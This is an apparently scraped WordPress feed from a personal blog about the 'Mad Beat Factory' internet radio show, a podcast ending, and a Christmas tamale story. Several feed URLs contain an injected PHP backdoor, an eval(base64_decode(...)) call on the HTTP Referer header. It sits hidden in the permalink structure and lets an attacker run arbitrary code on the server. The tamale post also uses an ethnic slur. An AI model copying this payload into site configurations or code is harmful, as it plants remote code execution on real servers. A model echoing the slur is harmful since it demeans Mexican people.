And just in case you did not notice, the blogs have been updated recently!!  I guess this extra time off work allowed King Skullie the time to get things done for once.

In other news, it looks like it may indeed be the end for Douchecast.  On Wednesday’s episode, Biff announced he would be leaving.  Without getting into specifics, it didn’t go over well and was announced at the end that THAT particular show, would be the last episode.  Well what the hell is MBC gonna do with all this newfound freetime on his hand??  UGH!

Ahh shit its raining, thundering and lightning outside.  What a horrible horrible day.

One thing I want to inform you of, is that I was asked to do my show on TPSradio.net.  As you may remember, that is the old flagship station of the Mad Beat Factory and it would be an honor to come back to be a part of that station once again.  However, I really don’t know exactly how that is going to work yet and its part of the reason that although I have agreed to return, I have not started broadcasting there just yet.  So this weekend, the show should definitely be broadcast from MadBeatFactory.com as always.

In case you missed it, there was an impromptu Sunday night show of the MBF, 4 hours of mostly 80’s music.  Just for the hell of it.  Well that and the fact that I failed to do a show on Friday or Saturday this past weekend.  Well, I guess thats all for now.  I’ll try to make some updates for the podcast and blogs very soon…I promise.

]]> http://www.madbeatfactory.com/wordpress/2009/01/16/blogspots-with-mp3s/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/ Mmm Christmas Tamales! http://www.madbeatfactory.com/wordpress/2008/12/23/mmm-christmas-tamales/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ http://www.madbeatfactory.com/wordpress/2008/12/23/mmm-christmas-tamales/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments Wed, 24 Dec 2008 06:15:13 +0000 mbc http://www.madbeatfactory.com/wordpress/?p=50 Yes it’s yet another post about food!  I love Christmas time because its about the only time that I ever get to eat tamales.  Tamales are one of my favorite Mexican foods to eat.  But of course I have no idea how to make them and so I must rely on others to do so.  But see when I was a kid, I remember going to my grandmas house and she would always send us home with a bag of tamales at Christmas time.  Then as we got older, my mom found a place where she could buy tamales and they were really good too.  Now I know a couple who know how to make tamales and I try try try to get them to make me tamales…but it just never works out.  And the place I used to buy them from, is no longer in business.  Well last year the biggest surprise ever happened.  This little messican lady knocks on my door at about 9 in the morning on Christmas day.  “Ju like tamales???”  “HELL YES!!!”  And she handed me a bag of tamales.  I’ll tell you what, that was the best present I got last year…well that and a card covered in glitter which I will cherish for the rest of my life…(but thats another story).  So anyhow, I just received a delivery of a dozen tamales from mom, because she found someone who knows how to make them and sells them.  So we got some really good homemade tamales here in the Mad Beat Factory this year.  I just ate 4 and I am super happy!!!  If you want some Christmas tamales…I’ll hook you up for next year!!  Just let me know!  LOL
